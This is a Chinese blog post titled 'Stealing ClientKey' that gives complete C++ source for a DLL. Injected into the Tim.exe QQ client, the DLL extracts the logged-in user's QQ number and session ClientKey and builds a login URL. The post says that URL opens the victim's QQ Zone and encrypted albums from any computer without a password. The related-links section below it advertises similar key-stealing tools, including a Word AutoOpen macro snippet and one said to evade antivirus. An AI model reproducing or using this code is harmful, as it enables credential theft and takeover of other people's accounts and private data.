窃取ClientKey

最新推荐文章于 2024-10-21 19:35:06 发布
原创 最新推荐文章于 2024-10-21 19:35:06 发布 · 1.5k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了DLL注入技术,展示了如何通过编译特定DLL并将其注入目标进程来获取敏感信息,如QQ空间的访问URL,无需密码即可访问加密相册等。文章提供了详细的源代码示例,包括DLL入口点定义、函数调用流程以及输出调试信息的方法。

编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~

DLL源码:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdio.h>
#include <WTypes.h>

//定义CTXStringW为BSTR
typedef BSTR CTXStringW;

CTXStringW AllocTXString(const wchar_t* lpSrc)
{
    if (lpSrc == NULL) return NULL;
    BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
    if (bBuffer == NULL) return NULL;
    DWORD dwZero = 0;
    DWORD dwCount = 3;
    DWORD dwLenth = wcslen(lpSrc) + 1;
    memmove(bBuffer + 0 * 4, &dwZero, 4);
    memmove(bBuffer + 1 * 4, &dwCount, 4);
    memmove(bBuffer + 2 * 4, &dwLenth, 4);
    memmove(bBuffer + 3 * 4, &dwLenth, 4);
    wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
    return CTXStringW(bBuffer + 16);
}

VOID Steal()
{
    do {

        HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
        if (hKernelUtil == NULL)
        {
            OutputDebugStringA("Get KernelUtil Module failed \n");
            break;
        }

        PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
        if (PtrGetSelfUin == NULL)
        {
            OutputDebugStringA("Get GetSelfUin Function failed \n");
            break;
        }

        DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
        if (uin == NULL)
        {
            OutputDebugStringA("Invoke GetSelfUin Function failed \n");
            break;
        }

        // Print QQ number
        char szUin[MAX_PATH] = { 0 };
        sprintf(szUin, "%d", uin);

        PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
        if (GetSignature == NULL)
        {
            OutputDebugStringA("Get GetSignature Function failed \n");
            break;
        }

        WCHAR wsBuffer[MAX_PATH] = { 0 };
        CTXStringW ClientKey = AllocTXString(wsBuffer);
        PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");
        if (res == NULL)
        {
            OutputDebugStringA("Invoke GetSignature Function failed \n");
            break;
        }

        // 复制下面链接,无需密码,进入QQ空间
        char msg[MAX_PATH] = { 0 };
        sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);
        OutputDebugStringA(msg);

    } while (0);
   


}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Steal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
获取腾讯clientkey
06-18
这个是易语言写的获取腾讯clientkey的代码
取QQclientkey.rar
04-06
取QQclientkey.rar
读取ClientKey的另一种思路,无需注入DLL
friendan的专栏
01-02 3300
需要注意的是,这种方法获取的clientkey长度是224位,和之前注入dll获取的不一样。 注入dll获取的是64位的clientkey 利用方法: 64字节: http://ptlogin2.qq.com/jump?ptlang=2052&clientuin=QQ号码&clientkey=64个字节的KEY&u1=需要登陆的QQ服务网站地址 224字节: htt...
QQ快速登录协议分析
热门推荐
跟派大星学编程
03-16 1万+
1.获取pt_local_token 请求 https://xui.ptlogin2.qq.com/cgi-bin/xlogin?s_url=https%3A%2F%2Fhuifu.qq.com%2Findex.html&amp;amp;style=20&amp;amp;appid=715021417&amp;amp;proxy_url=https%3A%2F%2Fhuifu.qq.com%2Fproxy.html ...
2023年最新版获取QQ Clientkey
【Rainbow Network Technology co., LTD】
02-06 9320
2023年最新版获取QQ Clientkey方法
利用网页快捷登录协议截取ClientKey、Key工具
gitblog_09788的博客
10-21 742
利用网页快捷登录协议截取ClientKey、Key工具 去发现同类优质开源项目:https://gitcode.com/ 工具简介 本工具是针对最新的腾讯QQ客户端版本(9.7.20)设计的,实现了利用网页快捷登录协议来捕获和分析用户电脑上已登录QQ的相关安全密钥信息,如ClientKey、Skey、P_skey等。这一过程通过一系列精心设计的步骤完成,旨在教育和研究目的,了解此协议的工作原理。 ...
调用QQ/TIM算法实现获取当前登陆账号和ClientKey
u013367305的博客
04-17 2302
调用QQ/TIM算法实现获取当前登陆账号和ClientKey 本文为看雪论坛优秀文章;看雪论坛作者ID:揰掵佲 https://bbs.pediy.com/thread-255014.htm 由于通过网页版实现快捷登陆被TX和谐了,所以,各种群验证以及相继失效!因此,想起来很多年前玩的一种方法,就拿出来分享了! 登陆QQ的网页,除了从网页快捷登陆之外,还可以通过QQ面板,直接登陆! 所以,我们点击QQ面板上的QQ空间标志,等待网页弹出,进入成给功 进入之后 是这样的状态 https://user.qzon
2023版模拟浏览器获取Clientkey新方法
如果Clientkey泄露,攻击者可以利用它来伪装成合法用户,进而窃取用户数据或进行其他恶意操作。因此,对于Clientkey的生成、存储和传输都需要进行严格的安全措施。 6. 文件内容解析 文件压缩包中包含的skinppwtl....
易语言SSL代理客户端源码-易语言
06-13
SSL是一种广泛应用于互联网的安全加密传输协议,能够确保在网络传输过程中数据的完整性和保密性,防止数据在传输过程中被窃取或篡改。在这款源码中,易语言作为编程工具,提供了简洁易懂的语法结构,使得开发者可以...
如何在抖音小程序中集成微信支付?
最新发布
07-18
此外,需要注意的是,整个过程中涉及的数据交互必须严格遵守微信支付的安全规范,确保签名机制正确无误,以防止数据被篡改或窃取[^1]。 ### 相关问题 1. 如何保障抖音小程序与微信支付接口之间的数据安全性? 2. ...
Clientkey代码利用工具
10-25
获取了别人的ClientKey,轻松进入对方的QQ空间、微博、邮箱等
易语言-QQ clientkey 提取 Wegame TGP_ID tgp_ticket等
06-29
QQ clientkey 提取 Wegame TGP_ID tgp_ticket等,源码是简单的网页POST应用例程。
QQkey获取及邮箱发送
04-23
具体QQkey作用,自己百度。不会失望的
劫持最新版 QQNT / QQ / TIM 客户端 QQKey、QQClientKey
03-08
文章地址: https://blog.youkuaiyun.com/qq_39190622/article/details/135298346 截取QQNT、TIM、QQ客户端QQKey、ClientKey并过免杀过360演示。
WeGame / WeGameKey / QQKey 登录缓存信息提取器 v1.0
02-26
可以截取 WeGame Login Cache WeGame AccountImpl Cache WeGame Sig Cache WeGame Cookie Cache WeGame Ticket Cache WeGame Keys Cache WeGame PTLoginURL WeGame ClientKey 等等帐号信息数据。
qqkey是否安全?.docx
09-27
当你选择“快速登录”时,浏览器会向腾讯的服务器发送一个clientkey的GET请求,服务器验证无误后会返回一个身份认证cookie,即我们所说的QQKey。这个key相当于一种临时的身份证明,允许你无需输入密码就能访问特定的...
易语言邮件收取类模块源码-易语言
06-13
在邮件收取过程中,这些库文件用于保证数据传输的安全性,防止信息在互联网上被窃取或篡改。 2. `类_邮件收取类_2.e` 是易语言源代码文件,很可能是实现邮件收取功能的核心类,包含了相关的函数和方法。 3. `Client...
VBA版本获取ClientKey
Sven的忘却日记
01-02 1039
Sub AutoOpen() ' ' AutoOpen 宏 ' On Error GoTo ErrorHandler Set xmlhttp = CreateObject("WinHttp.WinHttpRequest.5.1") ' Step 1 Get pt_local_token xmlhttp.Open "GET", "https://xui.ptlogin2.qq.com/cgi-b...
clientkey
laoshufa的博客
08-18 273
clientkey
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值